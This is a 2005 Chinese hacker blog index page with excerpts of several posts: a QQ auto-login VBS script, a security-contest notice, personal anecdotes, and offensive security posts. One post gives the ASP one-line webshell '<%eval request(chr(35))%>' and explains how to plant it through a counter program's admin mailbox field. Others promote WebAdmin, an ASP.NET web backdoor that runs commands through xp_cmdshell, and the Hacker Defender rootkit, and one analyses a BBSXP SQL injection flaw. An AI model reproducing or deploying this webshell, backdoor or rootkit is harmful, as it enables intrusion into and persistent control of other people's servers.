QQ AutoLogin VBS

2005/08/07 8:42 | 鬼仔 | 技术文章 | 消灭0留言

QQ自动登陆的VBS代码

Dim WshShell, QQPath, QQselect
QQPath="D:\Progra~1\Tencent\QQ\CoralQQ.exe" 'QQ所在路径
Set WshShell=WScript.CreateObject("WScript.Shell")
WshShell.Run QQPath
WScript.Sleep 2000
WshShell.AppActivate "QQ登录1"
WshShell.SendKeys "+{TAB}"
WshShell.SendKeys "123456789" 'QQ号码
WScript.Sleep 200
WshShell.SendKeys "{TAB}"
WshShell.SendKeys "123456789" 'QQ密码
WScript.Sleep 200
WshShell.SendKeys "{ENTER}"
阅读全文 »

“2005网络安全中原行”暨“首届中原网络安全攻防大赛”

2005/08/07 8:09 | 鬼仔 | 心情随笔 | 2 条评论了已经

ps:如果到时候还没上学走的话就去现场看..

首届中原网络安全攻防大赛活动方案
详情查看:http://www.wrsky.com/is/1.htm
一、主办单位:火狐技术联盟

二、承办单位:河南极致互动传媒有限公司

三、协办单位:E化通企业用网研究室 开封市互联数据信息中心

四、媒体支持:大河报 河南报业网 商都网 省内各地信息港

五、活动特色:

“ 公益、多维、联动 ”

公益:中原首届网络安全功防大赛属公益性活动,任何单位、公司和个人都可免费参加活动 , 更为突出的是在活动现场安全专家免费对参加活动用户的网站、网络进行免费的安全检查和评估。

多维:攻防大赛利用多维的活动宣传方式,包括多家报纸、多家网络安全杂志、多家国内知名网络媒体及电视媒体等。

联动:国内最大免费网络安全技术交流论坛“火狐技术联盟”网站站长陈鑫携联盟核心 阅读全文 »

COCOON Counter统计程序后台写马

2005/08/07 8:05 | 鬼仔 | 技术文章 | 消灭0留言

来源:9xiao's Blog

引用最新海洋顶端eval版中的几句话,这里要用到的是<%eval request(chr(35))%>,
"evalExecutePP.htm的文本框里自己写的代码就是添用2006X2.exe转换后生成的那个html文本框里的代码。什么是文本框大家知道吧?不知的就去查查html吧。这样添好了,就可以用自己的做的c端了。如果不会,你就用我的那个现成的“2006c端的例子.htm”吧。
S端是<%eval(request("#"))%>或<%eval request("#")%>或<%eval request(chr(35))%>等等,或不用%,自己变形吧,不多说了"
偶在本地架设了一个环境,实际操作中不能写错否则后悔就来不急了,在管理信箱那把cnhacker at 263 dot net":eval request(chr(35))//复制过去,,点击保存,看下_inc/common.asp的内容
阅读全文 »

有人注意这条新闻没?有关QQ在线时长调整的.

2005/08/06 3:30 | 鬼仔 | 乱七八糟 | 3 条评论了已经

以前是按小时算的,8月15日要改成按天算的了.
以后挂QQ的就不会有那么多了..看来QQ挂机的站也要关不少了..
不过不管怎样,对我来说都无所谓,以前我就没挂过,都是自己聊出来的.
详细情况和计算方式看下面:

QQ在线计划说明

腾讯公司将于2005年8月15日推出新的QQ在线计划服务。通过累积活跃天数,您就可以获取相应的QQ等级。累积在线天数将有机会参加我们即将推出的奖励活动和享受相关的优惠服务,而不影响正常的QQ使用。 拥有QQ在线等级为太阳级别及以上的用户,可享受任意上传设置QQ自定义头像和建立一个QQ群的尊贵特权。 阅读全文 »

后悔了…

2005/08/02 4:18 | 鬼仔 | 心情随笔 | 14 条评论了已经

昨天坐车往老家来,我旁边坐着个MM..
长的不错,穿的还很暴露,背上还有文身.
路上我拿烟出来抽,MM用胳膊碰了我一下,说了句话,我没听清楚,还以为她怕烟味,不让我抽,但是又不确定,没听清,就问了句:"怎么了?"
MM说:"给我一支好吗?" :mad: 汗一个先..
我给了她一支,MM说:"谢谢."
然后看她没火机,就帮她点着了..MM又说:"谢谢!"
然后我抽完烟就睡了..

:cry: 后悔的是MM都主动跟我打岔了, :shock: 我为什么就不能跟MM聊会呢?
:lol: 聊的话肯定有前途….哈哈..

:mad: 不过那MM比我大好几岁..聊也没什么可聊的.

:shock: 今天才想起来这些..当时只以为MM是想抽烟..
不过我不喜欢主动接近人..

WebAdmin 2.X发布

2005/07/31 7:09 | 鬼仔 | 工具收集 | 消灭0留言

介绍:

WebAdmin是一个运行在ASP.NET环境下的Web后门

功能列表:

·管理目录和文件(包括浏览、编辑、删除、上传、下载、移动等等)
·ASPNET帐户执行CMD
·利用SQL的xp_cmdshell扩展存储执行CMD
·读取注册表内容
·管理access、MSSQL数据库
·“克隆”文件时间
·查看服务器信息
阅读全文 »

Tags:

BBSXP漏洞再探究

2005/07/31 6:46 | 鬼仔 | 技术文章 | 7 条评论了已经

文章作者:职业欠钱@[F.W.S.T]
信息来源:邪恶八进制(www.eviloctal.com)

注:本文已发表在《黑客X档案》2005年6期,版权归其所有,转载请保持文章完整性并注明版权

最近BBSXP论坛可以说是一点都不平静。漏洞一个接一个暴出来。上次对showforum.asp这个文件的漏洞分析过后,没多久,又暴出blog.asp存在漏洞。于是俺这个菜鸟的心再不能平静了,不要每次都等着人家给我们找漏洞,咱自己也来分析一把看看。
首先,我们回顾一下showforum.asp中的漏洞,还记得order变量,是经过了HTMLncode过滤了以后才放到SQL语句中去执行的。再来看看blog.asp中出漏洞的地方:

id=HTMLEncode(Request("id"))
if id<>"" then
sql="select * from [calendar] where id="&id&" order by id Desc"
阅读全文 »

Hxdef中文使用说明(修正版)

2005/07/31 6:42 | 鬼仔 | 工具收集 | 3 条评论了已经

—————————————————————————-
文章来源:http://lams.blogchina.com/2115525.html
—————————————————————————-
by:ziqi

更正了一些错误,同时根据HF的要求做了一些调整,每行不能多于81个字符,更改了头部说明。调整了格式。如果可能的话,以后就可以在下载的Hxdef程序的压缩包里面发现这样的说明。

======================[ Hacker defender – 中文使用说明 ]======================

NT Rootkit
———-
阅读全文 »